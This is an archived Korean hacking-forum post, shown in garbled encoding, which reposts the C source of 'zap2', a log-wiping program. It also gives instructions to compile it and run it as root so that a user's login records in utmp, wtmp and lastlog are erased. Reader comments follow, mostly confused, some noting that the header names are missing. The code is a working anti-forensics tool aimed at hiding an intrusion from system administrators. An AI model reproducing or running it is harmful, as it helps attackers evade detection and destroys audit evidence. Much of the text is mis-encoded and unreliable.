1597, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   starztp
   [Æß]ÇØÄ¿µéÀÇ ÈçÀûÁö¿ì´Â¹æ¹ý

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=333 [º¹»ç]





*ÇØÄ¿µéÀÌ ÀÚ½ÅÀÇ ÈçÀûÀ» Áö¿ì´Â ¹æ¹ý





ÀÚ½ÅÀÇ ·Î±ä Á¤º¸¸¦ Áö¿ì´Â ÇÁ·Î±×·¥Àº

±âº»ÀûÀ¸·Î /etc/utmp¿Í /var/adm/wtmp¿Í /var/adm/lastlog¿¡ ´ëÇÑ Àбâ¿Í

¾²±â±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÕ´Ï´Ù. SunOS 4.1.X°è¿­ÀÇ utmpÀÇ ¸ðµå°¡ -rw-rw-rw-·Î

µÇ¾î ÀÖ°í SunOS 5.X °è¿­ÀÇ utmpÀÇ ¸ðµå´Â -rw-r-r-·Î µÇ¾î ÀÖ½À´Ï´Ù.

½Ã½ºÅÛ¿¡ µû¶ó ´Ù¸¦ ¼öµµ ÀÖÁö¿ä. µû¶ó¼­, ÀÌ ÇÁ·Î±×·¥À» ½ÇÇàÇØ º¸·Á°í ÇÏ´Â

»ç¶÷Àº SunOS 4.1.XÀ» »ç¿ëÇØ¾ß ÇÕ´Ï´Ù. ÀÌ´Â uname -aÀÇ ¸í·É¾î·Î ¾Ë¾Æ º¼ ¼ö

ÀÖ½À´Ï´Ù. ±×·±µ¥ ÀÚ½ÅÀÌ ÀÏ¹Ý »ç¿ëÀÚ°¡ ¾Æ´Ñ root¶ó¸é ±¸Áö OSÀÇ ¹öÀü¿¡

¿µÇâÀ» ¹ÞÀ» ÇÊ¿ä°¡ ¾ø½À´Ï´Ù. ÇØÄ¿³ª ´Ù¸¥ »ç¶÷ÀÌ Á¢¼ÓÇÏ¸é ½Ã½ºÅÛ¿¡

/etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏ¿¡ Á¢¼Ó ±â·ÏÀÌ ³²½À´Ï´Ù.

±×·¡¼­ ÈçÀûÀ» ¾ø¾Ö±â À§Çؼ­´Â À§ÀÇ È­ÀÏÀ» º¯°æÇÕ´Ï´Ù. À̰͵éÀº ÅؽºÆ® ÆÄÀÏÀÌ

¾Æ´Ï¶ó¼­ vi·Î ÆíÁýÇÒ ¼ö ¾ø°í Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±×·¥À» ÀÛ¼ºÇØ¾ß ÇÕ´Ï´Ù.

¹Ù·Î ±× ÇÁ·Î±×·¥ÀÌ ¾Æ·¡¿¡ ÀÖ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. C¾ð¾î·Î ÀÛ¼º µÇ¾î ÀÖ½À´Ï´Ù.

ÀÌ ÇÁ·Î±×·¥ ¸»°íµµ ¿©·¯ °¡ÁöÀÇ ÈçÀû Áö¿ì´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù´Â °ÍÀ» ¾Ë·Áµå¸³´Ï´Ù.

¾Æ·¡ ÇÁ·Î±×·¥À» rootÀÇ ±ÇÇÑ¿¡¼­ µ¹·Á¼­ Á¢¼ÓÈçÀûÀ» Áö¿ó´Ï´Ù.

À¯´Ð½º ½© »óÅ¿¡¼­ ¾Æ·¡ ÆÄÀϸíÀ» test.c·Î ÀúÀåÇؼ­ cc -o rmuser test.c ·Î

ÄÄÆÄÀÏ Çؼ­ rmuser¸¦ ½ÇÇà½ÃÅ°¸é µË´Ï´Ù.



hack%cc -o rmuser test.c

hack%rmuser



À§ÀÇ ¸í·ÉÀ» ½ÇÇàÇؼ­ who¶ó°í ¸í·É Çغ¸½Ê½Ã¿À.

±ôÂÊ °°ÀÌ ÀÚ½ÅÀÌ »ç¶óÁ® ÀÖÀ» °Ì´Ï´Ù.

Âü°í·Î who´Â ÇöÀç ½Ã½ºÅÛ¿¡ ·Î±äÇØ ÀÖ´Â »ç¿ëÀÚ¸¦ ¾Ë¾Æº¸´Â ¸í·É¾î ÀÔ´Ï´Ù.



ÇÁ·Î±×·¥ ¼Ò½º tset.cÀÇ ³»¿ë



#include

#include

#include

#include

#include

#include

#include

#include



#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;



if ((f=open(UTMP_NAME,O_RDWR))>=0) {



while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )



if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {



bzero((char *)&utmp_ent,sizeof( utmp_ent ));



lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);



write (f, &utmp_ent, sizeof (utmp_ent));



}



close(f);



}



}



void kill_wtmp(who)



char *who;



{



struct utmp utmp_ent;



long pos;

pos = 1L;



if ((f=open(WTMP_NAME,O_RDWR))>=0) {



while(pos != -1L) {



lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);



if (read (f, &utmp_ent, sizeof (struct utmp))<0) {



pos = -1L;



} else {



if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {



bzero((char *)&utmp_ent,sizeof(struct utmp ));



lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);



write (f, &utmp_ent, sizeof (utmp_ent));



pos = -1L;



} else pos += 1L;



}



}



close(f);



}



}



void kill_lastlog(who)



char *who;



{

struct passwd *pwd;

struct lastlog newll;



if ((pwd=getpwnam(who))!=NULL) {



if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {



lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);



bzero((char *)&newll,sizeof( newll ));



write(f, (char *)&newll, sizeof( newll ));



close(f);



}



} else printf("%s: ?\n",who);



}



main(argc,argv)



int argc;



char *argv[];



{



if (argc==2) {



kill_lastlog(argv[1]);



kill_wtmp(argv[1]);



kill_utmp(argv[1]);



printf("Zap2!\n");



} else printf("Error.\n");

}


  Hit : 13241     Date : 2005/10/08 03:53



    
starztp Æۿ°̴ϴÙ. ¸¸¾à À߸øµÈºÎºÐÀÌÀÖ´Ù¸é ¸®Çô޾ÆÁÖ¼¼¿ä ¹Ù·Î»èÁ¦ÇÏ°Ú½À´Ï´Ù.(´ÔµéÀº À̱ÛÀ» ¾Ë¾ÆµéÀ¸½Ç²¨¶ó »ý°¢ÇÏ¿© ¿Ã¸°°Ì´Ï´Ù ¹°·Ð Àú´Â ¹«½¼³»¿ëÀÎÁö ÀßÀº¸ð¸£Áö¸¸¿ä..) °í¼ö´ÔµéÀÌ º¸½Ã°í 2005/10/08  
starztp À߸øµÈºÎºÐÀ̳ª ¼öÁ¤ÇؾßÇҺκР±×¸®°í Áߺ¹³»¿ë ¾µ¶¼¾ø´Â³»¿ëÀ̶ó¸é ¾ÇÇôٽÃÁö¸¶½Ã°í ±×³É ÀÌ·±Àú·±»çÀ¯·ÎÀÎÇؼ­ »èÁ¦ºÎŹÇÑ´Ù°í ½áÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù....^^ 2005/10/08  
nsh009 ¼Ò½º°¡ ¸¹ÀÌ ±æ¾îÁø°Å °°³»¿ä.. ÀÎÅÍ³Ý µ¹¾Æ´Ù´Ï´Ù°¡ º»°Å¶û ºñ±³Çϸé.. ²Ï ±â³×¿ä.. 2005/10/08  
°ñµå ¾îµð¼±°¡ º»°Å´Â °°Àºµ¥ ... ¾îµð¼­¿´Áö 2005/10/08  
awsedr45 ±×¿Ü etc/syslog.conf /var/adm/sulog /var/log /.history bash.history /var/adm/utmp wtmp µµ ÀÖ½À´Ï´Ù. 2005/10/08  
kamijyo Çì´õÆÄÀÏÀÌ ¾È½áÁø°Å °°Àºµ¥; ¹«¾ù ¹«¾ùÀÌ ¾²Àΰǰ¡¿ä?? 2005/10/08  
starztp Çì´õÆÄÀÏÀ̹ºÁö Àú´Â¸ð¸¨´Ï´Ùa Ȥ °í¼ö´ÔµéÀÌ º¸½Ã¸é ¾Ë±î µµ¿òÀÌ µÉ±î½Í¾î Æۿ°̴ϴÙ;;; ÇãÁ¢³»¿ëÀ̶ó¸é »èÁ¦ÇÏ°Ú½À´Ï´Ù;; »èÁ¦ ¿äûÇØÁÖ¼¼¿ä ; 2005/10/09  
°ñµå #include<stdio.h> ÀÌ·±°Ô Çì´õÆÄÀÏÀε¥ #include ¿·¿¡ ¾Æ¹«°Íµµ ¾ø³×¿ä. Áö¿öÁ³³ª. 2005/10/10  
µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® ¤¶¤²¤©¤± Àú°Å ÁøÂ¥¸ð¸£°Ù´Ù ¤Ð¤Ð 2005/10/12
starztp ±Û½ê¿äa 2005/10/13  
º¸±âµå¹®Å·Ä« ¿ª½ÃC++°ú ¸®´ª½º´Â ÆÄ°íµé¼ö·Ï ¸Ó¸® ¾ÆÆÄÁü ¤Ñ¤Ñ ¾Æ ¾î¶»°Ô ÇØ¾ß Á¡¼ö Àß¹ÞÀ»±î¿ä Çб³¼­ ¤Ñ¤Ñ¤» 2005/10/16
¸Û¸Û¡¡¡¡ À߸øµÈ ºÎºÐ ¼öÁ¤µÇ¾ú½À´Ï´Ù printf("Zap2!\n"); ¿¡¼­ printf("Zap1!\n"); ·Î 2005/10/26  
angel6116 ¹ÌÄ¡µµ·Ï ¹º¸»ÀÎÁö ¾Ë°í½Í¾îÁø´Ù;; ÀüÇô ¾Ë¾ÆµéÀ»¼ö°¡ ¾ø³×..¤Ð_¤Ð 2005/11/06  
.. -_- Çì´õÆÄÀÏ stdio.h , utmp.h , fcntl.h µî ³Ö°í ÄÄÆÈÇß´õ´Ï ÇÔ¼ö³» ¿¡·¯ -¤±-;; 2005/11/10
.. L_XTND ¼±¾ð ¾ÈµÇ¾îÀִٴµ­ -¤±-; 2005/11/10
c0003c ÀÌ°Ô µµ´ëü ¹º¸»ÀÌ¿©-_-;; 2005/11/13  
tbvjqk À¸¾Ç ¸Ó¸® ¾ÆÆÄ 2005/11/13  
msjeon9323 Çä Àú°Å ¾´ ´Ô!! Á» ½±°Ô ¼³¸í ±Û·Î... 2005/11/20  
±×¸°³ª·¡ include ¿¡ Çì´õÆÄÀÏÀÌ ºüÁ®Àֳ׿ä.. ¾Æ¸¶ ²©»õÇ¥½Ã°¡ ű×..·Î ÀÎÇØ »ç¶óÁøµíÇѵ¥¿ä 2005/11/29  
H.R.T -0- ÀÌ°Ô¸Ó¾ß...¾Ë¾Æº¼¼ö°¡ ¾ø³×..;;¤»¤» 2005/12/12  
X-line ¼Ò½ºÀÝ¾Æ¿ä ¤¾¤¾ 2005/12/15  
X-line ÀÌ°Å ÀÌÇØÇÒ¼öÀÖ´Ù¸é Á¤¸» ÁÁÀ»ÅÙµ¥.. 2005/12/15  
¹«¼ÒÀ¯ ÇØÄ¿½ºÄðÃ¥¿¡µµ ÀÌ·±°Å ³ª¿Ôµç°Å°°µçµ¥ ¤¾ 2005/12/16  
gbajh ÇØÄ¿½ºÄð Ã¥µµ ÀÖ¾î¿ä? 2006/01/02  
¹Ùº¸ÇØÄ¿ C++ÀÇ¿Ü·Î ¹è¿ì¸é ½±»ï! 2006/01/22
marilin29 Çä! 2006/12/12  
whqkdnf000 °¨»çÇÕ´Ï´Ù...ÁÁÀºÁ¤º¸ 2007/02/26  
rocket07 fopne ÇÔ¼ö¿¡¼­ f ºüÁø°Å °°Àºµ­. . 2012/01/21  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 19480
1596   [pwnable.kr] bof     ÇØÅ·ÀßÇÏ°í½Í´Ù
12/25 12
1595   [pwnable.kr] Shellshock[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 128
1594   ShellshockÀÇ ±âº» ¿ä¾à     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 109
1593   [pwnable.kr] fd     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 104
1592   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 111
1591   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 150
1590   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 128
1589   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 104
1588   [pwnable.kr] cmd1 °ø·«     ÇØÅ·ÀßÇÏ°í½Í´Ù
10/23 265
1587   netdiscover ÆÄÀ̽ãÀ¸·Î ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 543
1586   ÆÄÀ̽ãÀ» ÀÌ¿ëÇÑ ½ÉÇà À¥ Å©·Ñ·¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 431
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/30 985
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/28 876
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/26 1027
1582   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 693
1581   ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 840
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 930
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 1445
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 2328
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org